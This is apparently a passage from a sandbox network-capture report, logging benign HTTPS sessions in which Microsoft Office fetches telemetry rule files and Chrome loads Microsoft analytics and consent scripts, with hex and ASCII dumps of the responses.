                                                                                                                                                                                                                      Cache-Control: public, max-age=163
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:42:03 GMT
                                                                                                                                                                                                                      Content-Length: 55
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      X-CID: 2
                                                                                                                                                                                                                      2024-11-20 16:42:03 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                                                                                                                      Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      92192.168.2.74981613.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:42:03 UTC193OUTGET /rules/rule224901v11s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:42:03 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:42:03 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 2284
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BCD58BEEE"
                                                                                                                                                                                                                      x-ms-request-id: d35eb2be-501e-0064-3d8c-3a1f54000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164203Z-185f5d8b95cp7lkfhC1NYC7rpw0000000ang00000000ey6x
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:42:03 UTC2284INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      93192.168.2.74981513.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:42:03 UTC192OUTGET /rules/rule120601v3s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:42:03 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:42:03 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 3342
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582B927E47E9"
                                                                                                                                                                                                                      x-ms-request-id: c9ccbc18-001e-0014-5cf1-3a5151000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164203Z-185f5d8b95c5lcmhhC1NYCsnsw0000000adg000000016hdk
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:42:03 UTC3342INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      94192.168.2.74981913.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:42:03 UTC191OUTGET /rules/rule90401v3s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:42:04 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:42:04 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 1250
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BDE4487AA"
                                                                                                                                                                                                                      x-ms-request-id: 6fe4cd85-501e-0029-2ea1-3ad0b8000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164204Z-185f5d8b95cdh56ghC1NYCk1x400000004d0000000005rns
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:42:04 UTC1250INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 39 30 34 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 53 61 6d 70 6c 69 6e 67 50 6f 6c 69 63 79 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 4d 65 74 61 64 61 74 61 22 20 2f 3e 0d
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="90401" V="3" DC="ESM" EN="Office.Telemetry.SamplingPolicy" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" DL="A" DCa="PSP PSU" xmlns=""> <RIS> <RI N="Metadata" />


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      95192.168.2.74982213.107.246.634436380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:42:04 UTC549OUTGET /scripts/c/ms.jsll-4.min.js HTTP/1.1
                                                                                                                                                                                                                      Host: js.monitor.azure.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                                                                      Referer: https://learn.microsoft.com/
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-20 16:42:04 UTC889INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:42:04 GMT
                                                                                                                                                                                                                      Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                      Content-Length: 207935
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      Cache-Control: no-transform, public, max-age=1800, immutable
                                                                                                                                                                                                                      Last-Modified: Mon, 14 Oct 2024 17:27:31 GMT
                                                                                                                                                                                                                      ETag: 0x8DCEC757C1AD1D1
                                                                                                                                                                                                                      x-ms-request-id: 24663fe8-301e-00d3-0bb2-2cfca8000000
                                                                                                                                                                                                                      x-ms-version: 2009-09-19
                                                                                                                                                                                                                      x-ms-meta-jssdkver: 4.3.3
                                                                                                                                                                                                                      x-ms-meta-jssdksrc: [cdn]/scripts/c/ms.jsll-4.3.3.min.js
                                                                                                                                                                                                                      Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,x-ms-meta-jssdkver,x-ms-meta-jssdksrc,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                      x-azure-ref: 20241120T164204Z-185f5d8b95crwqd8hC1NYCps680000000ak0000000004eph
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:42:04 UTC15495INData Raw: 2f 2a 21 0a 20 2a 20 31 44 53 20 4a 53 4c 4c 20 53 4b 55 2c 20 34 2e 33 2e 33 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 4d 69 63 72 6f 73 6f 66 74 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 20 2a 20 28 4d 69 63 72 6f 73 6f 66 74 20 49 6e 74 65 72 6e 61 6c 20 4f 6e 6c 79 29 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 75 6e 64 65 66 69 6e 65 64 22 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 21 3d 6e 29 74 28 65 78 70 6f 72 74 73 29 3b 65 6c 73 65 20 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69
                                                                                                                                                                                                                      Data Ascii: /*! * 1DS JSLL SKU, 4.3.3 * Copyright (c) Microsoft and contributors. All rights reserved. * (Microsoft Internal Only) */!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&defi
                                                                                                                                                                                                                      2024-11-20 16:42:04 UTC16384INData Raw: 28 69 29 3a 28 72 3d 66 65 28 22 63 6f 6e 73 6f 6c 65 22 29 29 26 26 28 72 2e 65 72 72 6f 72 7c 7c 72 2e 6c 6f 67 29 28 74 2c 63 65 28 69 29 29 29 29 7d 53 65 28 61 3d 7b 74 68 65 6e 3a 6f 2c 22 63 61 74 63 68 22 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6f 28 75 6e 64 65 66 69 6e 65 64 2c 65 29 7d 2c 22 66 69 6e 61 6c 6c 79 22 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 2c 6e 3d 74 3b 72 65 74 75 72 6e 20 51 28 74 29 26 26 28 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 26 26 74 28 29 2c 65 7d 2c 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 72 6f 77 20 74 26 26 74 28 29 2c 65 7d 29 2c 6f 28 65 2c 6e 29 7d 7d 2c 22 73 74 61 74 65 22 2c 7b 67 65 74 3a 64 7d 29 2c 68 74 28 29 26 26 28 61 5b 6d 74 28
                                                                                                                                                                                                                      Data Ascii: (i):(r=fe("console"))&&(r.error||r.log)(t,ce(i))))}Se(a={then:o,"catch":function(e){return o(undefined,e)},"finally":function(t){var e=t,n=t;return Q(t)&&(e=function(e){return t&&t(),e},n=function(e){throw t&&t(),e}),o(e,n)}},"state",{get:d}),ht()&&(a[mt(
                                                                                                                                                                                                                      2024-11-20 16:42:04 UTC16384INData Raw: 28 65 2c 74 2c 6e 2c 72 29 7b 67 65 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 26 26 65 5b 74 5d 26 26 28 6e 3f 28 6e 2e 63 62 5b 74 65 5d 28 7b 66 6e 3a 72 2c 61 72 67 3a 65 7d 29 2c 6e 2e 68 3d 6e 2e 68 7c 7c 6e 6e 28 70 63 2c 30 2c 6e 29 29 3a 4d 28 72 2c 5b 65 5d 29 29 7d 29 7d 68 63 2e 5f 5f 69 65 44 79 6e 3d 31 3b 76 61 72 20 76 63 3d 68 63 3b 66 75 6e 63 74 69 6f 6e 20 68 63 28 65 29 7b 74 68 69 73 2e 6c 69 73 74 65 6e 65 72 73 3d 5b 5d 3b 76 61 72 20 6e 2c 69 3d 5b 5d 2c 61 3d 7b 68 3a 6e 75 6c 6c 2c 63 62 3a 5b 5d 7d 2c 6f 3d 76 6f 28 65 2c 64 63 29 5b 4b 6e 5d 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6e 3d 21 21 65 2e 63 66 67 2e 70 65 72 66 45 76 74 73 53 65 6e 64 41 6c 6c 7d 29 3b 76 65 28 68 63 2c 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28
                                                                                                                                                                                                                      Data Ascii: (e,t,n,r){ge(e,function(e){e&&e[t]&&(n?(n.cb[te]({fn:r,arg:e}),n.h=n.h||nn(pc,0,n)):M(r,[e]))})}hc.__ieDyn=1;var vc=hc;function hc(e){this.listeners=[];var n,i=[],a={h:null,cb:[]},o=vo(e,dc)[Kn](function(e){n=!!e.cfg.perfEvtsSendAll});ve(hc,this,function(
                                                                                                                                                                                                                      2024-11-20 16:42:05 UTC16384INData Raw: 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 61 2e 66 6c 75 73 68 43 6f 6d 70 6c 65 74 65 3d 65 2c 50 3d 21 30 2c 52 2e 72 75 6e 28 6f 2c 61 29 2c 66 5b 67 72 5d 28 29 2c 6f 5b 6c 72 5d 28 61 29 7d 2c 36 2c 6e 29 2c 69 7d 2c 66 5b 6f 72 5d 3d 73 2c 66 2e 61 64 64 50 6c 75 67 69 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 72 29 7b 69 66 28 21 65 29 72 65 74 75 72 6e 20 72 26 26 72 28 21 31 29 2c 76 6f 69 64 20 43 28 6f 75 29 3b 76 61 72 20 69 3d 73 28 65 5b 24 6e 5d 29 3b 69 66 28 69 26 26 21 74 29 72 65 74 75 72 6e 20 72 26 26 72 28 21 31 29 2c 76 6f 69 64 20 43 28 22 50 6c 75 67 69 6e 20 5b 22 2b 65 5b 24 6e 5d 2b 22 5d 20 69 73 20 61 6c 72 65 61 64 79 20 6c 6f 61 64 65 64 21 22 29 3b 76 61 72 20 61 2c 6f 3d 7b 72 65 61 73 6f 6e 3a 31 36 7d 3b 66
                                                                                                                                                                                                                      Data Ascii: (e,function(e){a.flushComplete=e,P=!0,R.run(o,a),f[gr](),o[lr](a)},6,n),i},f[or]=s,f.addPlugin=function(e,t,n,r){if(!e)return r&&r(!1),void C(ou);var i=s(e[$n]);if(i&&!t)return r&&r(!1),void C("Plugin ["+e[$n]+"] is already loaded!");var a,o={reason:16};f
                                                                                                                                                                                                                      2024-11-20 16:42:05 UTC16384INData Raw: 6c 3a 31 2c 43 72 69 74 69 63 61 6c 3a 32 7d 29 2c 75 6e 64 65 66 69 6e 65 64 2c 75 6e 64 65 66 69 6e 65 64 29 2c 53 6c 3d 22 22 3b 66 75 6e 63 74 69 6f 6e 20 78 6c 28 65 29 7b 74 72 79 7b 69 66 28 6f 65 28 6f 74 28 29 29 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 76 61 72 20 74 3d 28 6e 65 77 20 44 61 74 65 29 5b 4f 73 5d 28 29 2c 6e 3d 66 65 28 65 3d 3d 3d 45 6c 2e 4c 6f 63 61 6c 53 74 6f 72 61 67 65 3f 22 6c 6f 63 61 6c 53 74 6f 72 61 67 65 22 3a 22 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 22 29 2c 72 3d 53 6c 2b 74 2c 69 3d 28 6e 2e 73 65 74 49 74 65 6d 28 72 2c 74 29 2c 6e 2e 67 65 74 49 74 65 6d 28 72 29 21 3d 3d 74 29 3b 69 66 28 6e 5b 52 73 5d 28 72 29 2c 21 69 29 72 65 74 75 72 6e 20 6e 7d 63 61 74 63 68 28 61 29 7b 7d 72 65 74 75 72 6e 20 6e 75 6c
                                                                                                                                                                                                                      Data Ascii: l:1,Critical:2}),undefined,undefined),Sl="";function xl(e){try{if(oe(ot()))return null;var t=(new Date)[Os](),n=fe(e===El.LocalStorage?"localStorage":"sessionStorage"),r=Sl+t,i=(n.setItem(r,t),n.getItem(r)!==t);if(n[Rs](r),!i)return n}catch(a){}return nul
                                                                                                                                                                                                                      2024-11-20 16:42:05 UTC16384INData Raw: 6f 20 74 72 61 63 6b 20 70 61 67 65 20 76 69 73 69 74 20 74 69 6d 65 20 66 61 69 6c 65 64 2c 20 6d 65 74 72 69 63 20 77 69 6c 6c 20 6e 6f 74 20 62 65 20 63 6f 6c 6c 65 63 74 65 64 3a 20 22 2b 63 65 28 72 29 29 7d 7d 2c 59 28 65 2c 22 5f 6c 6f 67 67 65 72 22 2c 7b 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 7d 7d 29 2c 59 28 65 2c 22 70 61 67 65 56 69 73 69 74 54 69 6d 65 54 72 61 63 6b 69 6e 67 48 61 6e 64 6c 65 72 22 2c 7b 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 7d 7d 29 7d 29 7d 76 61 72 20 4e 64 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 74 68 69 73 5b 67 64 5d 3d 50 74 28 29 2c 74 68 69 73 2e 70 61 67 65 4e 61 6d 65 3d 65 2c 74 68 69 73 2e 70 61 67 65 55 72 6c 3d 74 7d 2c 44 64 3d 66 75 6e 63 74 69 6f 6e 28
                                                                                                                                                                                                                      Data Ascii: o track page visit time failed, metric will not be collected: "+ce(r))}},Y(e,"_logger",{g:function(){return o}}),Y(e,"pageVisitTimeTrackingHandler",{g:function(){return c}})})}var Nd=function(e,t){this[gd]=Pt(),this.pageName=e,this.pageUrl=t},Dd=function(
                                                                                                                                                                                                                      2024-11-20 16:42:05 UTC16384INData Raw: 63 6f 72 65 44 61 74 61 2c 22 62 65 68 61 76 69 6f 72 22 29 2c 75 65 28 6e 2e 70 61 67 65 54 79 70 65 29 26 26 28 65 2e 70 61 67 65 54 79 70 65 3d 6e 2e 70 61 67 65 54 79 70 65 29 2c 75 65 28 72 2e 5f 70 61 67 65 54 79 70 65 4d 65 74 61 54 61 67 29 26 26 21 75 65 28 65 2e 70 61 67 65 54 79 70 65 29 26 26 28 65 2e 70 61 67 65 54 79 70 65 3d 72 2e 5f 70 61 67 65 54 79 70 65 4d 65 74 61 54 61 67 29 2c 75 65 28 72 2e 5f 6d 61 72 6b 65 74 4d 65 74 61 54 61 67 29 26 26 28 65 2e 6d 61 72 6b 65 74 3d 72 2e 5f 6d 61 72 6b 65 74 4d 65 74 61 54 61 67 29 2c 65 2e 69 73 4c 6f 67 67 65 64 49 6e 3d 47 64 28 72 2e 5f 63 6f 6e 66 69 67 29 2c 74 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 3d 6f 63 28 29 7d 2c 69 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 73 65 74 50 61 67 65 54
                                                                                                                                                                                                                      Data Ascii: coreData,"behavior"),ue(n.pageType)&&(e.pageType=n.pageType),ue(r._pageTypeMetaTag)&&!ue(e.pageType)&&(e.pageType=r._pageTypeMetaTag),ue(r._marketMetaTag)&&(e.market=r._marketMetaTag),e.isLoggedIn=Gd(r._config),t.cookieEnabled=oc()},ip.prototype._setPageT
                                                                                                                                                                                                                      2024-11-20 16:42:05 UTC16384INData Raw: 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 41 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 69 73 54 72 61 63 6b 65 64 57 69 74 68 44 61 74 61 42 69 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 65 2e 61 74 74 72 69 62 75 74 65 73 2c 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 7e 74 5b 6e 5d 2e 6e 61 6d 65 2e 69 6e 64 65 78 4f 66 28 22 64 61 74 61 2d 62 69 2d 22 29 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 41 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 69 73 54 72 61 63 6b 65 64 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 65 2e 61 74 74 72 69 62 75 74 65 73 2c 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 22 64 61 74 61 2d 6d 22 3d 3d 3d 74 5b 6e 5d 2e 6e 61 6d
                                                                                                                                                                                                                      Data Ascii: n!0;return!1},Ap.prototype._isTrackedWithDataBi=function(e){for(var t=e.attributes,n=0;n<t.length;n++)if(~t[n].name.indexOf("data-bi-"))return!0;return!1},Ap.prototype._isTracked=function(e){for(var t=e.attributes,n=0;n<t.length;n++)if("data-m"===t[n].nam
                                                                                                                                                                                                                      2024-11-20 16:42:05 UTC16384INData Raw: 75 74 68 54 6f 6b 65 6e 22 2c 61 3d 22 41 75 74 68 58 54 6f 6b 65 6e 22 2c 67 67 3d 22 6d 73 66 70 63 22 2c 76 67 3d 22 75 73 65 72 22 2c 68 67 3d 22 61 6c 6c 6f 77 52 65 71 75 65 73 74 53 65 6e 64 69 6e 67 22 2c 6d 67 3d 22 66 69 72 73 74 52 65 71 75 65 73 74 53 65 6e 74 22 2c 79 67 3d 22 73 68 6f 75 6c 64 41 64 64 43 6c 6f 63 6b 53 6b 65 77 48 65 61 64 65 72 73 22 2c 43 67 3d 22 67 65 74 43 6c 6f 63 6b 53 6b 65 77 48 65 61 64 65 72 56 61 6c 75 65 22 2c 62 67 3d 22 73 65 74 43 6c 6f 63 6b 53 6b 65 77 22 2c 79 65 3d 22 6c 65 6e 67 74 68 22 2c 54 67 3d 22 63 6f 6e 63 61 74 22 2c 49 67 3d 22 69 4b 65 79 22 2c 45 67 3d 22 63 6f 75 6e 74 22 2c 5f 67 3d 22 65 76 65 6e 74 73 22 2c 53 67 3d 22 70 75 73 68 22 2c 78 67 3d 22 73 70 6c 69 74 22 2c 4e 67 3d 22 73 70
                                                                                                                                                                                                                      Data Ascii: uthToken",a="AuthXToken",gg="msfpc",vg="user",hg="allowRequestSending",mg="firstRequestSent",yg="shouldAddClockSkewHeaders",Cg="getClockSkewHeaderValue",bg="setClockSkew",ye="length",Tg="concat",Ig="iKey",Eg="count",_g="events",Sg="push",xg="split",Ng="sp
                                                                                                                                                                                                                      2024-11-20 16:42:05 UTC16384INData Raw: 29 29 2c 65 5b 6c 76 5d 26 26 28 65 5b 6c 76 5d 3d 65 61 28 65 5b 6c 76 5d 29 29 29 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 2c 74 29 7b 69 66 28 65 5b 79 76 5d 7c 7c 28 65 5b 79 76 5d 3d 30 29 2c 65 5b 43 76 5d 7c 7c 28 65 5b 43 76 5d 3d 31 29 2c 6c 28 65 29 2c 65 5b 62 76 5d 29 69 66 28 55 7c 7c 61 65 29 65 5b 43 76 5d 3d 33 2c 65 5b 62 76 5d 3d 21 31 3b 65 6c 73 65 20 69 66 28 48 29 72 65 74 75 72 6e 20 57 26 26 28 65 3d 65 61 28 65 29 29 2c 48 5b 72 76 5d 28 45 76 2e 63 72 65 61 74 65 28 65 5b 49 67 5d 2c 5b 65 5d 29 2c 21 30 3d 3d 3d 65 5b 62 76 5d 3f 31 3a 65 5b 62 76 5d 2c 33 29 3b 76 61 72 20 6e 3d 65 5b 43 76 5d 2c 72 3d 63 65 2c 69 3d 52 2c 61 3d 28 34 3d 3d 3d 6e 26 26 28 72 3d 6f 65 2c 69 3d 4f 29 2c 21 31 29 3b 72 3c 69 3f 61 3d 21 43 28 65 2c
                                                                                                                                                                                                                      Data Ascii: )),e[lv]&&(e[lv]=ea(e[lv])))}function a(e,t){if(e[yv]||(e[yv]=0),e[Cv]||(e[Cv]=1),l(e),e[bv])if(U||ae)e[Cv]=3,e[bv]=!1;else if(H)return W&&(e=ea(e)),H[rv](Ev.create(e[Ig],[e]),!0===e[bv]?1:e[bv],3);var n=e[Cv],r=ce,i=R,a=(4===n&&(r=oe,i=O),!1);r<i?a=!C(e,


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      96192.168.2.74982113.107.246.634436380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:42:04 UTC551OUTGET /mscc/lib/v2/wcp-consent.js HTTP/1.1
                                                                                                                                                                                                                      Host: wcpstatic.microsoft.com
